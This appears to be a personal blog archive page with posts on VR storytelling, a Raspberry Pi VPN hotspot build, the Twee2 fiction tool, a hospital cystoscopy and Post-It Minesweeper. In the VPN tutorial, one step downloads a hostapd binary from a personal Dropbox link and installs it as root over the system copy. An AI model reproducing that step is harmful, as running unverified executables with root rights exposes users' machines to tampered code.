As I mentioned in the previous blog post, we’ve already seen the evolution of storytelling media on several occasions, such as the jump from theatre to cinema and the opportunities that this change eventually provided. Early screenwriters couldn’t have conceived of some of the tools used in modern films, like the use of long flowing takes for establishing shots or the use of fragmented hand-held shots to add an excited energy to fight scenes. It wasn’t for lack of imagination (Georges Méliès realised back in the nineteenth century that timelapse photography could be used to produce special effects not possible in theatre) but rather a lack of the technology and more-importantly a lack of the maturity of the field. There’s an ongoing artistic process whereby storytellers find new ways to manage their medium from one another: Romeo Must Die may have made clever use of a “zoom-to-X-ray” when a combatant’s bones were broken, but it wouldn’t have been possible if The Matrix hadn’t shown the potential for “bullet time” the previous year. And if we’re going down that road: have you seen the bullet time scene in Zotz!, a film that’s older than the Wachowskis themselves?

Clearly, we’re going to discover new ways of telling stories that aren’t possible with traditional “flat screen” media nor with more-immersive traditional theatre: that’s what makes VR as a storytelling tool so exciting.

Perhaps the original cinematic use of bullet time, in Zotz!
The original use of bullet time still wasn’t entirely new, as the original bullet predates it by hundreds of years.

Of course, we don’t yet know what storytelling tools we’ll find in this medium, but some ideas I’ve been thinking about are:

  • Triggering empathetic responses by encouraging the audience to more-closely relate to the situation of characters by putting them more-directly “in their shoes”. That Dragon, Cancer, an autobiographical game about the experience of a child’s terminal cancer, is an incredibly emotive experience… but only begins to touch upon the emotional journeys possible through virtual reality: what’s it really like to be close to somebody who’s terminally ill?
  • Allowing spectators to spectate a story in their own way, or from a perspective that they choose and control. We’ve already begun to explore this as a concept with the (little-used) multi-angle feature on DVDs: for example, if you’ve got the special edition of Die Hard then you can rewatch certain scenes and flick between different cameras as you watch. But that’s nothing on the potential for future animated films to allow you to walk or fly around and watch from any angle… or in the case of interactive experiences, to influence the direction that the story takes by your actions or even just by your presence: how about a heist story in which the burglars will only carry out their plan if they can’t tell that you’re watching them, forcing you to be surreptitious in your glances over to see what they’re up to?
"Fly" motion simulator
There’s no need to build a rollercoaster at all: a good motion simulator plus a VR headset can probably provide a similar experience.
  • Combining VR with motion simulation: Alton Towers is leading the way here, with their announcement that they’re going to re-engineer the Air rollercoaster into Galactica, upon which the ride gives the sensation of motion while a Samsung Gear VR headset simulates an otherwise-impossible spacefaring experience, and I’m hugely excited about the prospect. But a more-adaptable and economical way to achieve a similar result would be to repurpose a motion simulator: the good ones can provide the sensation of g-forces on almost any vector for an extended period of time; the really good ones can provide short bursts of g-forces at levels other than that provided by Earth’s gravity (usually by flinging the carriage around on a programmable shuttle arm, although weightlessness is still unfeasible while you remain on the ground). If you didn’t think that 2013’s Gravity was nauseating enough when it was merely in 3D, wait until you try a similar experience in motion-assisted virtual reality.
  • Point-of-view framing: this paradigm has always been at least a little unsatisfying in regular movies. I mean, it might have been the best moment in Doom, but that’s more to do with how apalling that film was than how good the technique is! But the potential for stepping in to the viewpoint of another human and being able to look around has great potential for immersion-building without allowing the participant to stray too-far from the main storyline. Something that people who haven’t yet experienced VR don’t often appreciate is that a few little things can really improve the experience of immersion… things like being able to move your head, even just being a few degrees, make you feel like you’re “there”. There are some big challenges to overcome with this, of course, such as how to make the movement of the camera not make the watcher feel ‘dragged along’, especially if their experience is of moving sideways… but these are challenges that will probably be solved for us quickly by the porn industry, who’re working very hard on making this kind of experience seamless. Just like the leaps and bounds we took with streaming video, yet again technology will get to thank peoples’ love of porn for advancing what home computers are capable of.
GIF showing a variety people watching VR porn. [SFW]
Nothing in this GIF reflects how people will genuinely watch VR porn. There’ll be a lot more lube and a lot fewer clothes, I guarantee it.
  • Exploring therapeutic experiences: until I really started trying out different VR gear, I didn’t think that it would be sufficiently engaging to be able to trigger a strong enough response to be useful in a therapeutic capacity. But after the first time I came out of a 10-minute game of Caaaaardboard! feeling genuinely wobbly at the knees in the same way as after my first parachute jump, I realised that modern VR really can produce an experience that results in a psychosomatic response. And that’s really important, because it provides a whole new medium in which we can treat (and, I suppose, study), for example, phobias in a controlled and ‘escapable’ environment. Of course, that raises other questions too, such as: is it possible to cause disorders like PTSD with virtual reality? If it’s simply the case that optimally-made VR is more-immersive than the best possible “flat screen” experiences and that it’s this that can improve its therapeutic potential, then surely it can be more-traumatic, too: I know enough people that were emotionally-scarred by Bambi‘s mother’s death, E.T.‘s almost-death, or that one scene from Watership Down that gave me nightmares for years: how much more (potentially)-damaging could a VR experience be? Whether or not it’s truly the case, it’ll only take one or two media circuses about murderous psychopaths who are unable to differentiate their virtual reality from the real kind before people start getting asked these kind of questions.
  • Oh, and this webcomic, of course.

As I’m sure I’ve given away these last three blog posts, I’m really interested in the storytelling potential of VR, and you can bet I’ll be bothering you all again with updates of the things I get to play with later this year (and, in fact, some of the cool technologies I’ve managed to get access to just while I’ve been writing up these blog posts).

If you haven’t had a chance to play with contemporary VR, get yourself a cardboard. It’s dirt-cheap and it’s (relatively) low-tech and it’s nowhere near as awesome as “real” hardware solutions… but it’s still a great introduction to what I’m talking about and it’s absolutely worth doing. And if you have, I’d love to hear your thoughts on storytelling using virtual reality, too.

× × × × × ×

Immersive Storytelling – Thoughts on Virtual Reality, part 2

This is the second in a three-part blog post about telling stories using virtual reality. Read all of the parts here.

I’m still waiting to get in on the Oculus Rift and HTC Vive magic when they’re made generally-available, later this year. But for the meantime, I’m enjoying quite how hackable VR technologies are. I chucked my Samsung Galaxy S6 edge into an I Am Cardboard DSCVR, paired it with a gaming PC using TrinusVR, used GlovePIE to hook up a Wii remote (playing games with a keyboard or even a gamepad is challenging if your headset doesn’t have a headstrap, so a one-handed control is needed), and played a game of Gone Home. It’s a cheap and simple way to jump into VR gaming, especially if – like me – you already own the electronic components: the phone, PC, and Wiimote.

An I Am Cardboard, a Samsung Galaxy S6, and a Nintendo Wii Remote
My VR system is more-ghetto than yours.

While the media seems to mostly fixate on the value of VR in “action” gaming – shoot-’em-ups, flight simulators, etc. – I actually think there’s possibly greater value in it more story-driven genres. I chose Gone Home for my experiment, above, because it’s an adventure that you play at your own pace, where the amount you get out of it as a story depends on your level of attention to detail, not how quickly you can pull a trigger. Especially on this kind of highly-affordable VR gear, “twitchy” experiences that require rapid head turning are particularly unsatisfying, not-least because the response time of even the fastest screens is always going to be significantly slower than that of real life. But as a storytelling medium (especially in an affordable form) it’s got incredible potential.

Screengrab from Hong Kong Unrest - a 360° Virtual Reality Documentary.
Nothing quite gives you a feel of the human scale of the Hong Kong protests like being able to look around you, as if you’re stood in the middle of them.

I was really pleased to discover that some content creators are already experimenting with the storytelling potential of immersive VR experiences. An example would be the video Hong Kong Unrest – a 360° Virtual Reality Documentary, freely-available on YouTube. Standing his camera (presumably a Jump camera rig, or something similar) amongst the crowds of the 2014 Hong Kong protests, the creator of this documentary gives us a great opportunity to feel as though we’re standing right there with the protesters. The sense of immersion of being “with” the protesters is, in itself, a storytelling statement that shows the filmmaker’s bias: you’re encouraged to empathise with the disenfranchised Hong Kong voters, to feel like you’re not only with them in a virtual sense, but emotionally with them in support of their situation. I’m afraid that watching the click-and-drag version of the video doesn’t do it justice: strap a Cardboard to your head to get the full experience.

An augmented reality shoot-'em-up game via Microsoft Hololens
Don’t go thinking that I’m not paying attention to the development of the Hololens, too: I am, because it looks amazing. I just don’t know… what it’s for. And, I suspect, neither does Microsoft.

But aside from the opportunities it presents, Virtual Reality brings huge new challenges for content creators, too. Consider that iconic spaghetti western The Good, The Bad, And The Ugly. The opening scene drops us right into one of the artistic themes of the film – the balance of wide and close-up shots – when it initially shows us a wide open expanse but then quickly fills the frame with the face of Tuco (“The Ugly”), giving us the experience of feeling suddenly cornered and trapped by this dangerous man. That’s a hugely valuable shot (and a director’s wet dream), but it represents something that we simply don’t have a way of translating into an immersive VR setting! Aside from the obvious fact that the viewer could simply turn their head and ruin the surprise of the shot, it’s just not possible to fill the frame with the actor’s face in this kind of way without forcing the focal depth to shift uncomfortably.

Opening scene of The Good, The Bad, And The Ugly.
Sergio Leone’s masterpiece makes strategic use of alternating close and wide shots (and shots like the opening, which initially feels open but rapidly becomes claustrophobic).

That’s not to say that there exist stories that we can’t tell using virtual reality… just that we’re only just beginning to find out feet with this new medium. When stage directors took their first steps into filmography in the early years of the 20th century, they originally tried to shoot films “as if” they were theatre (albeit, initially, silent theatre): static cameras shooting an entire production from a single angle. Later, they discovered ways in which this new medium could provide new ways to tell stories: using title cards to set the scene, close-ups to show actors’ faces more-clearly, panning shots, and so on.

Similarly: so long as we treat the current generation of VR as something different from the faltering steps we took two and a half decades ago, we’re in frontier territory and feeling our way in VR, too. Do you remember when smartphone gaming first became a thing and nobody knew how to make proper user interfaces for it? Often your tiny mobile screen would simply try to emulate classic controllers, with a “d-pad” and “buttons” in the corners of the screen, and it was awful… but nowadays, we better-understand the relationship that people have with their phones and have adapted accordingly (perhaps the ultimate example of this, in my opinion, is the addictive One More Line, a minimalist game with a single-action “press anywhere” interface).

Dan plays Back To Dinosaur Island on an Oculus Rift.
A few seconds after this photograph was taken, a T-rex came bounding out from the treeline and I literally jumped.

I borrowed an Oculus Rift DK2 from a co-worker’s partner (have I mentioned lately that I have the most awesome co-workers?) to get a little experience with it, and it’s honestly one of the coolest bits of technology I’ve ever had the priviledge of playing with: the graphics, comfort, and responsiveness blows Cardboard out of the water. One of my first adventures – Crytek’s tech demo Back to Dinosaur Island – was a visual spectacle even despite my apparently-underpowered computer (I’d hooked the kit up to Gina, my two-month old 4K-capable media centre/gaming PC: I suspect that Cosmo, my multi-GPU watercooled beast might have fared better). But I’ll have more to say about that – and the lessons I’ve learned – in the final part of this blog post.

× × × ×

Immersive Storytelling – Thoughts on Virtual Reality, part 1

This is the first in a three-part blog post about telling stories using virtual reality. Read all of the parts here.

As part of my work at the Bodleian… but to a greater extent “just for fun”… I’ve spent the last few weeks playing with virtual reality. But first, a history lesson.

Dan stomps around his office wearing a Google Cardboard.
Virtual Reality’s biggest failing is that it’s sheer coolness is equally offset by what an idiot you look like when you’re using it.

This isn’t the first time I’ve used virtual reality. The first time, for me, was in the early 1990s, at the Future Entertainment Show, where I queued for a shot at Grid Busters on a Virtuality 1000-CS. The Virtuality 1000 was powered by an “Expality”: functionally an Amiga 3000 with specially-written software for reading the (electromagnetically-sensed) facing of the headset and the accompanying “space joystick”… and providing output via a pair of graphics cards (one for each eye) to LCD screens. The screens were embedded in chunky bits on the sides of the helmet and projected towards mirrors and lenses at the far end – this apparently being an effort to reduce how “front-heavy” it felt, but I can tell you that in practice a  Virtuality headset felt weighty on your neck, even for its era!

Nonetheless, the experience stuck with me: I returned to school and became the envy of my friends (the nerdy ones, at least) when I told them about my VR adventure, and – not least thanks to programs like Tomorrow’s World and, of course, the episode of Bad Influence that reminded me quite how badly I wanted to get myself down to Nottingham for a go at Legend Quest – I was genuinely filled with optimism that within the decade, playing a VR game would have gone from the fringes of science fiction to being something where everybody-knew-somebody who did it routinely.

A Virtuality 1000 CS system.
A modern computer and VR headset combined probably weighs less than this reconditioned Virtuality 1000 headset.

I never managed to get to play Legend Quest, and that first “VR revolution” swiftly fell flat. My generation was promised all of the hi-tech science, immersion, and magical experience of The Lawnmower Man, but all we were left with was the overblown promises, expensive effects, and ill-considered user experience of, well… The Lawnmower Man. I discovered Virtuality machines in arcades once or twice, but they seemed to be out-of-order more often than not, and they quickly disappeared. You can’t really blame the owners of arcades: if a machine costs you in the region of £40,000 to buy and you can charge, say, £1 for a 3-minute go on it (bear in mind that even the most-expensive digital arcade machines tended to charge only around 30p, at this time, and most were 10p or 20p), and it needs supervision, and it can’t be maintained by your regular guy… well, that swiftly begins to feel like a bad investment.

Jobe's first experience of virtual reality, in 1992's The Lawnmower Man.
The Lawnmower Man has a lot to answer for.

Plus, the fifth generation of games consoles came along: the (original) Sony PlayStation, the Nintendo N64, and – if you really wanted the highest-technology system (with the absolute least imaginative developers) – the Sega Saturn. These consoles came at price points that made them suitable Christmas gifts for the good boys and girls of middle-class parents and sported 3D polygon graphics of the type that had previously only been seen in arcades, and the slow decline of the video arcade accelerated dramatically. But home buyers couldn’t afford five-figure (still moderately-experimental) VR systems, and the market for VR dried up in a matter of years. Nowadays, if you want to play on a Virtuality machine like the one I did, you need to find a collector (you might start with this guy from Leicester, whose website was so useful in jogging my memory while I wrote this blog post).

The Dean's VR machine, in Season 6 of Community, was clearly inspired by Virtuality.
And Jesus wept, for there were no more VR machines anywhere for, like, two decades.

2016 is the year in which this might change. The need for ubiquitous cheap computing has made RAM and even processors so economical that we throw them away when we’re done with them. The demands of modern gaming computers and consoles has given us fast but affordable graphics rendering hardware. And the battle for the hottest new smartphones each year has helped to produce light, bright, high-resolution screens no bigger than the palm of your hand.

In fact, smartphones are now the simplest and cheapest way to play with VR. Under the assumption that you’ve already got a smartphone, you’re only a couple of cheap plastic lenses and a bit of cardboard away from doing it for yourself. So that’s how my team and I started out playing: with the wonderfully-named Google Cardboard. I know that Google Cardboard is old-hat now and all the early adopters have even got their grandmothers using it now, but it’s still a beautiful example of how economical VR threatens to become if this second “VR revolution” takes hold. Even if you didn’t already own a compatible smartphone, you could buy a second-hand one on eBay for as little as £30: that’s an enormous difference from the £40K Virtuality machines of my youth, which had only a fraction of the power.

Liz plays with a Google Cardboard.
An original-style Google Cardboard makes you look as much of a fool as any VR headset does. But more-specifically like a fool with a box on their head.

I’m going somewhere with this, I promise: but I wanted to have a jumping-off point from which to talk about virtual reality more-broadly first and it felt like I’d be overstretching if I jumped right in at the middle. Y’know, like the second act of The Lawnmower Man. In the next part of this series, I’d like to talk about the storytelling opportunities that modern VR offers us, and some of the challenges that come with it, and share my experience of playing with some “proper” modern hardware – an Oculus Rift.

×

Highlights of 2016 so far

Despite a full workload and a backlog of both work, personal, volunteering and study emails to deal with, 2016 is off to a pretty good start so far. Here’s some highlights:

  • In Sainsburys at the weekend, I got carded. Less than a week before my thirty-fifth birthday and for the first time in well over a decade, somebody asked me to prove my age when I was trying to buy alcohol*. It’s even more-impressive when you consider that I was buying about £90 worth of shopping and a single small bottle of kirsch… oh, and I had a toddler with me. That would have been an incredible amount of effort for somebody who very-definitely looks like he’s in his thirties. Delighted.
  • This week, I’ve been mostly working on a project to make interactive digital content to support an exhibition on board games that we’re about to launch at my workplace. When my head of department first mentioned the upcoming exhibition, there was no way you could have held me back fast enough.
  • Annabel has recently decided that she deserves a beard like her father and her Uncle Dan. Her new game is encouraging people to draw them on her with washable pens. Aww.
Annabel sporting a full beard.
This one’s the third design of beard she’s had this week – this one’s “like daddy”.

I hope everybody else’s year is kicking off just as well.

* With one possible exception: the other year, an overenthusiastic bouncer insisted that I join a queue of one in turn to show him my ID before he let me into a nightclub at 9:30pm on a Wednesday night. Like I said, overenthusiastic.

×

Raspberry Pi VPN Hotspot (or How To Infuriate Theresa May For Under £40)

As you’re no-doubt aware, Home Secretary Theresa May is probably going to get her way with her “snooper’s charter” by capitalising on events in Paris (even though that makes no sense), and before long, people working for law enforcement will be able to read your Internet usage history without so much as a warrant (or, to put it as the UN’s privacy chief put it, it’s “worse than scary”).

John Oliver on Last Week Tonight discusses the bill.
Or as John Oliver put it, “This bill could write into law a huge invasion of privacy.” Click to see a clip.

In a revelation that we should be thankful of as much as we’re terrified by, our government does not understand how the Internet works. And that’s why it’s really easy for somebody with only a modicum of geekery to almost-completely hide their online activities from observation by their government and simultaneously from hackers. Here’s a device that I built the other weekend, and below I’ll tell you how to do it yourself (and how it keeps you safe online from a variety of threats, as well as potentially giving you certain other advantages online):

"Iceland", one of my Raspberry Pi VPN hotspots
It’s small, it’s cute, and it goes a long way to protecting my privacy online.

I call it “Iceland”, for reasons that will become clear later. But a more-descriptive name would be a “Raspberry Pi VPN Hotspot”. Here’s what you’ll need if you want to build one:

  • A Raspberry Pi Model B (or later) – you can get these from less than £30 online and it’ll come with an SD card that’ll let it boot Raspbian, which is the Linux distribution I’ve used in my example: there’s no reason you couldn’t use another one if you’re familiar with it
  • A USB WiFi dongle that supports “access point” mode – I’m using an Edimax one that cost me under a fiver – but it took a little hacking to make it work – I’ve heard that Panda and RALink dongles are easier
  • A subscription to a VPN with OpenVPN support and at least one endpoint outside of the UK – I’m using VyprVPN because I have a special offer, but there are lots of cheaper options: here’s a great article about choosing one
  • A basic familiarity with a *nix command line, an elementary understanding of IP networking, and a spare 20 minutes.

From here on, this post gets pretty geeky. Unless you plan on building your own little box to encrypt all of your home’s WiFi traffic until it’s well out of the UK and close-to-impossible to link to you personally (which you should!), then you probably ought to come back to it another time.

Here’s how it’s done:

1. Plug in, boot, and install some prerequisites

Plug the WiFi dongle into a USB port and connect the Ethernet port to your Internet router.  Boot your Raspberry Pi into Raspbian (as described in the helpsheet that comes with it), and run:

sudo apt-get install bridge-utils hostapd udhcpd bind9 openvpn

2. Make HostAPD support your Edimax dongle

If, like me, you’re using an Edimax dongle, you need to do an extra couple of steps to make it work as an access point. Skip this bit if you’re using one of the other dongles I listed or if you know better.

wget http://dl.dropbox.com/u/1663660/hostapd/hostapd.zip
unzip hostapd.zip
sudo mv /usr/sbin/hostapd /usr/sbin/hostapd.original
sudo mv hostapd /usr/sbin/hostapd.edimax
sudo ln -sf /usr/sbin/hostapd.edimax /usr/sbin/hostapd
sudo chown root.root /usr/sbin/hostapd
sudo chmod 755 /usr/sbin/hostapd

3. Set up OpenVPN

Get OpenVPN configuration files from your VPN provider: often these will be available under the iOS downloads. There’ll probably be one for each available endpoint. I chose the one for Reyjkavik, because Iceland’s got moderately sensible privacy laws and I’m pretty confident that it would take judicial oversight for British law enforcement to collaborate with Icelandic authorities on getting a wiretap in place, which is the kind of level of privacy I’m happy with. Copy your file to /etc/openvpn/openvpn.conf and edit it: you may find that you need to put your VPN username and password into it to make it work.

sudo service openvpn start

You can now test your VPN’s working, if you like. I suggest connecting to the awesome icanhazip.com and asking it where you are (you can use your favourite GeoIP website to tell you what country it thinks you’re in, based on that):

curl -4 icanhazip.com

Another option would be to check with a GeoIP service directly:

curl freegeoip.net/json/

4. Set up your firewall and restart the VPN connection

Unless your VPN provider gives you DNAT (and even if they do, if you’re paranoid), you should set up a firewall to allow only outgoing connections to be established, and then restart your VPN connection:

sudo iptables -A INPUT -i tun0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A INPUT -i tun0 -j DROP
sudo sh -c "iptables-save > /etc/iptables.nat.vpn.secure"
sudo sh -c "echo 'up iptables-restore < /etc/iptables.nat.vpn.secure' >> /etc/network/interfaces"
sudo service openvpn restart

5. Configure your WiFi hotspot

Configure bind as your DNS server, caching responses on behalf of Google’s DNS servers, or another DNS server that you trust. Alternatively, you can just configure your DHCP clients to use Google’s DNS servers directly, but caching will probably improve your performance overall. To do this, add a forwarder to /etc/bind/named.conf.options:

forwarders {
  8.8.8.8;
  8.8.4.4;
};

Restart bind, and make sure it loads on boot:

sudo service bind9 restart
sudo update-rc.d bind9 enable

Edit /etc/udhcpd.conf. As a minimum, you should have a configuration along these lines (you might need to tweak your IP address assignments to fit with your local network – the “router” and “dns” settings should be set to the IP address you’ll give to your Raspberry Pi):

start 192.168.0.2
end 192.168.0.254
interface wlan0
remaining yes
opt dns 192.168.0.1
option subnet 255.255.255.0
opt router 192.168.0.1
option lease 864000 # 10 days

Enable DHCP by uncommenting (remove the hash!) the following line in /etc/default/udhcpd:

#DHCPD_ENABLED="yes"

Set a static IP address on your Raspberry Pi in the same subnet as you configured above (but not between the start and end of the DHCP list):

sudo ifconfig wlan0 192.168.0.1

And edit your /etc/network/interfaces file to configure it to retain this on reboot (you’ll need to use tabs, not spaces, for indentation):

iface wlan0 inet static
  address 192.168.0.1
  netmask 255.255.255.0

And comment out the lines relating to hot-plugging of WiFi adapters/network hopping:

#allow-hotplug wlan0
#wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
#iface default inet manual

Right – onto hostapd, the fiddliest of the tools you’ll have to configure. Create or edit /etc/hostapd/hostapd.conf as follows, but substitute in your own SSID, hotspot password, and channel (to minimise interference, which can slow your network down, I recommend using WiFi scanner tool on your mobile to find which channels your neighbours aren’t using, and use one of those – you should probably avoid the channel your normal WiFi uses, too, so you don’t slow your own connection down with crosstalk):

interface=wlan0
driver=nl80211
ssid=your network name
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=your network password
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP

Hook up this configuration by editing /etc/default/hostapd:

DAEMON_CONF="/etc/hostapd/hostapd.conf"

Fire up the hotspot, and make sure it runs on reboot:

sudo service hostapd start
sudo service udhcpd start
sudo update-rc.d hostapd enable
sudo update-rc.d udhcpd enable

Finally, set up NAT so that people connecting to your new hotspot are fowarded through the IP tunnel of your VPN connection:

sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
sudo sh -c "echo net.ipv4.ip_forward=1 >> /etc/sysctl.conf"
sudo iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE
sudo sh -c "iptables-save > /etc/iptables.nat.vpn.secure"

6. Give it a go!

Connect to your new WiFi hotspot, and go to your favourite GeoIP service. Or, if your VPN endpoint gives you access to geographically-limited services, give those a go (you’d be amazed how different the Netflix catalogues are in different parts of the world). And give me a shout if you need any help or if you have any clever ideas about how this magic little box can be improved.

Further reading:

×

Twee2 – Interactive Fiction Authoring for Geeks

There’s a wonderful tool for making web-based “choose your own adventure”-type games, called Twine. One of the best things about it is that it’s so accessible: if you wanted to, you could be underway writing your first ever story with it in about 5 minutes from now, without installing anything at all, and when it was done you could publish it on the web and it would just work.

Screenshot of a Twine 2 story map
A “story map” in Twine 2. Easy interactive fiction writing for normal people.

But the problem with Twine is that, in its latest and best versions, you’re trapped into using the Twine IDE. The Twine IDE is an easy-to-use, highly visual, ‘drag-and-drop’ interface for making interactive stories. Which is probably great if you’re into IDEs or if you don’t “know better”… but for those of us who prefer to do our writing in a nice clean, empty text editor like Sublime or TextMate or to script/automate our builds, it’s just frustrating to lose access to the tools we love. Plus, highly-visual IDEs make it notoriously hard to collaborate with other authors on the same work without simply passing it back and forwards between you: unless they’ve been built with this goal in mind, you generally can’t have two people working in the same file at the same time.

Sublime Text demonstrating multi-line-selection.
Now THIS is what code editing should look like.

Earlier versions of Twine had a command-line tool called Twee that perfectly filled this gap. But the shiny new versions don’t. That’s where I came in.

In that way that people who know me are probably used to by now, I was very-slightly unsatisfied with one aspect of an otherwise fantastic product and decided that the correct course of action was to reimplement it myself. So that’s how, a few weeks ago, I came to release Twee2.

Twee2 logo
Twee2’s logo integrates the ‘branching’ design of Twine adventures with the ‘double-colon’ syntax of Twee.

If you’re interested in writing your own “Choose Your Own Adventure”-type interactive fiction, whether for the world or just for friends, but you find user-friendly IDEs like Twine limiting (or you just prefer a good old-fashioned text editor), then give Twee2 a go. I’ve written a simple 2-minute tutorial to get you started, it works on Windows, MacOS, Linux, and just-about everything else, and it’s completely open-source if you’d like to expand or change it yourself.

(there are further discussions about the concept and my tool on Reddit here, here, here and here, and on the Twinery forums herehere and here)

Get Twee2

× ×

Into the Lair of the Bladder Monster

Warning: this blog post contains pictures of urine, invasive equipment, and the inside of a bladder. It’s probably safe for all audiences, but you might like to put your glass of apple juice down for a minute or two. The short of it all is that I’m probably healthy.

Since my hospitalisation the other month with a renal system infection, I’ve undergone a series of investigations to try to determine if there’s an underlying reason that I fell ill. As my doctor explained to me, it’s quite possible that what I’d experienced was a random opportunistic infection (perhaps aided by a course of unrelated antibiotics I’d been on earlier this year or by certain lifestyle habits), but if that wasn’t the case – if there were some deeper explanation for my health problems – it was important to find out sooner, rather than later.

A sterile pot full of Dan Q's urine.
I’ve peed in so many little pots! If you laid them end-to-end across your kitchen counter, people would think that you were some kind of pervert.

Early on I had several ultrasound scans of my bladder (at a number of different times and at a variety of levels of fullness) and one of my kidneys, the latter of which revealed some “minor scarring” of one of them which apparently isn’t something I should be worried about… although I wish they’d started the two-page letter I got with that rather than opening with, effectively, “Contrary to what we told you at the hospital, we did later see something wrong with you…” But still, good to be reassured that this is probably not an issue.

Ultrasound scan of one of Dan Q's kidneys.
An ultrasound scan of one of my kidneys. Can you tell the sex yet?

More recently, I went to the hospital to have a “flow rate test” and a cystoscopy. The flow rate test involved the most-ghetto looking piece of NHS equipment I’ve ever seen: functionally, it seemed to be little more than a funnel on top of a large measuring beaker, in turn on top of a pressure-sensitive digital scale. The scale was connected up to the only fancy-looking bit of equipment in the room, a graphing printer that output the calculated volume (based on their weight) of the same and, more-importantly, the rate of change: the “flow rate” of the stream of urine.

A stream of urine pours down into a funnel.
I’m right, aren’t I? That’s basically a kitchen funnel, isn’t it?

I suppose one advantage of using equipment like this is that it basically operates itself. Which meant that the nurse was able to give me five seconds worth of instruction and then leave the room, which saved us from our own Britishness forcing us to make small-talk while I urinated in front of her or something. Ultimately, I turned out to be within the range of normalcy here, too, although I was a little disappointed to find that the ward didn’t maintain a daily “score board” of flow rates, as sort-of a science-backed literal pissing contest.

A graphing printer describes Dan Q's urine flow. The 'flow rate' graph shows an initial peak, then a trough, then continues to a higher sustained peak.
Apparently not all men experience that ‘spurt-and-then-full-pressure’ thing you’ll see on the graph on the right, when they start to pee, but some of us do, and it’s perfectly normal. I’m learning so much!

Finally came the cystoscopy, and this was the bit that I’d been most-nervous about. This procedure involves the insertion of a long flexible tube into the urethra at the tip of the penis, under local anasthetic, and pushing it all the way down, through the sphincter, down through the prostate and then back up into the bladder. It’s then used as a channel to pump water into the bladder, filling it to capacity and stretching out the sides, after which the fibreoptic cord (and light) that runs along its length is used to look around inside the bladder to inspect for any of a plethora of different problems.

Cystoscopy equipment, ready for insertion.
You’re going to put that WHERE?

The doctor invited me to watch with him on the monitor, which I initially assumed was because I was clearly interested in everything and kept asking questions, but in hindsight I wonder if it’s just that he – quite rightly – assumed that I might have panicked if I’d have been looking in the direction of the piece of equipment he brought in and jabbed at my penis with. I only looked at it while it was on its way out, and my god its a scary-looking thing: sort of like a cross between a tyre pressure gauge and a blowtorch. The first few inches were painless – the local anasthetic had made me completely numb right up to and including the external sphincter, which is at the base of the penis. However, what I can only assume was the second sphincter complained of the discomfort, and it stung pretty sharply any time the doctor would twist the cystoscope to change the angle of the picture.

View up a urethra, from a cystoscope.
The view as you ‘travel’ up the urethra looks pretty much like I expected. With a motion simulator, it would make a pretty cool ride!

Seeing the inside of your own body is an amazing experience. I mean: it’s not amazing enough to even be worth the experience of a cystoscopy, never mind the illness that in my case preceeded it… but it’s still pretty cool. The ultrasounds were interesting, but there’s nothing quite so immersive as seeing a picture of the inside of your own bladder, gritting your teeth while the doctor points to an indentation and explains that it’s the opening to the ureter that connects to your own left kidney!

Unfortunately I neglected to take my phone into the operating room, having put it into a locker when I changed into a gown, and so I wasn’t able to (as I’d hoped) take photos of the inside of my own bladder. So you’ll have to make do with this video I found, which approximates the experience pretty well. The good news is that there’s probably nothing wrong with me, now that the infection from earlier this year has passed: nothing to suggest that there’s any deeper underlying issue that caused me to get sick, anyway!

The bad news is that while the procedure itself was shorter and more-bearable than I’d expected, the recovery’s been a real drag. A week later, it still hurts a lot to urinate (although I’ve stopped yelping out loud when I do so) and my crotch is still too sore for me to be able to cycle. I’ve also discovered that an errection can be painful enough to wake me up, which is definitely not the most-pleasant way I’ve been roused by a penis. But it’s getting better, day by day, and at least I know for sure that I’m more-or-less “right” in the renal system, now.

× × × × × ×

Post-It Minesweeper

Remember Minesweeper? It’s probably been forever since you played, so go have a game online now. And there went your afternoon.

A game of Microsoft Minesweeper in progress.
This is actually a pretty tough move.

My geek-crush Ben Foxall posted on Twitter on Monday morning to share that he’d had a moment of fun nostalgia when he’d come into the office to discover that somebody in his team had covered his monitor with two layers of Post-It notes. The bottom layer contained numbers – and bombs! – to represent the result of a Minesweeper board, and the upper layer ‘covered’ them so that individual Post-Its could be removed to reveal what lay beneath. Awesome.

Ben Foxall discovers Post-It Minesweeper
Unlike most computerised implementations of Minesweeper, the first move isn’t guaranteed to be safe. Tread carefully…

Not to be outdone, I hunted around my office and found some mini-Post-Its. Being smaller meant that I could fit more of them onto a monitor and thus make a more-sophisticated (and more-challenging!) play space. But how to generate the board? Sure: I could do it by hand, but that doesn’t seem very elegant at all – plus, humans make really bad random number generators! I didn’t need quantum-tunnelling-seeded Minesweeper (yes, that’s a thing) levels of entropy, sure, but it’d still be nice to outsource the heavy lifting to a computer, right?

Screenshot of my Post-It Minesweeper board generator.
Yes, I’m quite aware of the irony of using a computer to generate a paper-based version of a computer game, why do you ask?

So naturally, I wrote a program to do it for me. Want to see? It’s at danq.me/minesweeper. Just line up some Post-Its on a co-worker’s monitor to work out how many you can fit across it in each dimension (I found that I could get 6 × 4 standard-sized Post-Its but 7 × 5 or even 8 × 5 mini-sized Post-Its very comfortably onto one of the typical widescreen monitors in my office), decide how many mines you want, and click Generate. Don’t like the board you get? Click it again!

Liz McCarthy tweets about her experience of being given a Post-It Minesweeper game to play.
I set up the first game on my colleague Liz’s computer, before she came in this morning.

And because I was looking for a fresh excuse to play with Periscope, I broadcast the first game I set up live to the Internet. In the end, 66 people ended up watching some or all of a paper-based game of Minesweeper played by my colleague Liz, including moments of cheering her on and, in one weird moment, despair at the revelation that she was married. The internet’s strange, yo.

Anyway: in case you missed the Periscope broadcast, I’ve put it on YouTube. Sorry about the portrait-orientation filming: I think it’s awful, too, but it’s a Periscope thing and I haven’t installed the new update that fixes it yet.

Now go set up a game of Post-It Minesweeper for a friend or co-worker.

× ×